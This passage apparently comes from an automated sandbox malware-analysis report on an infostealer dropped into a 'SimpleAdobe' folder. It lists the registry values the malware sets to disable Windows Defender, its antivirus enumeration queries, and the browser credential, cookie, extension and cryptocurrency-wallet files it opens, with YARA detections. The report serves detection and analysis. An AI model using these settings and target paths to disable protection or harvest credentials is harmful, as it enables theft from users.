Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\lockfile VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_004DC84D GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 7_2_004DC84D
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions Registry value created: Exclusions_Extensions 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender Registry value created: DisableAntiSpyware 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender Registry value created: DisableRoutinelyTakingAction 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableBehaviorMonitoring 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableOnAccessProtection 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableScanOnRealtimeEnable 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRawWriteNotification 1
Source: C:\Users\user\Desktop\WlCIinu0yp.exe Registry value created: Exclusions_Extensions 1
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File written: C:\Windows\System32\GroupPolicy\gpt.ini
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct

Stealing of Sensitive Information

Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.pRIMqfuwRZ49ldgjUZ_z2py6.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2417687969.0000000004648000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.1909434761.0000000000C62000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 19.2.wDFs1SzoVQiT2__nQmbIm6Rg.exe.317000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.wDFs1SzoVQiT2__nQmbIm6Rg.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.wDFs1SzoVQiT2__nQmbIm6Rg.exe.317000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.1955136682.0000000000315000.00000004.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wDFs1SzoVQiT2__nQmbIm6Rg.exe PID: 7800, type: MEMORYSTR
Source: Yara match File source: 16.2.H14SDf_AWcPvvQK5Xx97sISX.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.hvkESMr10WtP7_E6btIJmDx0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.rYuCm9r3mZzk_0VrthAnPu8c.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.2552343455.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2542152281.0000000005F92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2416770410.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2416630360.0000000005F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2418840174.0000000005FFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: hvkESMr10WtP7_E6btIJmDx0.exe PID: 7700, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ZzpT5hwyVjlAXfLjB1r1iwOX.exe PID: 7744, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rYuCm9r3mZzk_0VrthAnPu8c.exe PID: 7824, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Jl9_JMpull8yLuWoc7AXV8O.zip, type: DROPPED
Source: Yara match File source: 00000031.00000002.3127540718.00000000009C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000002.3128895190.0000000000A71000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: softjenimmp3converter.exe PID: 3992, type: MEMORYSTR
Source: Yara match File source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e2b000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e2b000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000015.00000002.1951214705.0000000000E29000.00000004.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.3121845008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 9RJ0JeM9uj2rfsuq_woBmmIY.exe PID: 7816, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 8000, type: MEMORYSTR
Source: Yara match File source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.raw.unpack, type: UNPACKEDPE
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416303909.0000000005FE2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416303909.0000000005FE2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\ElectronCash\wallets
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416303909.0000000005FE2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416303909.0000000005FE2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416303909.0000000005FE2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\wallets
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416303909.0000000005FE2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416303909.0000000005FE2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Binance\app-store.json
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416303909.0000000005FE2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\wallets
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416303909.0000000005FE2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416303909.0000000005FE2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\MultiDoge\multidoge.wallet
Source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: ~PColumnMasterKey_KeyStoreProviderNameNameP~PColumnMasterKey_KeyStoreProviderNameDescp~FSecurityPredicate_PredicateTypeDesc
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416303909.0000000005FE2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\signons.sqlite
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\signons.sqlite
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\formhistory.sqlite
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\logins.json
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe Directory queried: C:\Users\user\Documents
Source: Yara match File source: Process Memory Space: rYuCm9r3mZzk_0VrthAnPu8c.exe PID: 7824, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 8000, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.pRIMqfuwRZ49ldgjUZ_z2py6.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2417687969.0000000004648000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.1909434761.0000000000C62000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 19.2.wDFs1SzoVQiT2__nQmbIm6Rg.exe.317000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.wDFs1SzoVQiT2__nQmbIm6Rg.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.wDFs1SzoVQiT2__nQmbIm6Rg.exe.317000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.1955136682.0000000000315000.00000004.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wDFs1SzoVQiT2__nQmbIm6Rg.exe PID: 7800, type: MEMORYSTR
Source: Yara match File source: 16.2.H14SDf_AWcPvvQK5Xx97sISX.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.hvkESMr10WtP7_E6btIJmDx0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.rYuCm9r3mZzk_0VrthAnPu8c.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.2552343455.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2542152281.0000000005F92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2416770410.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
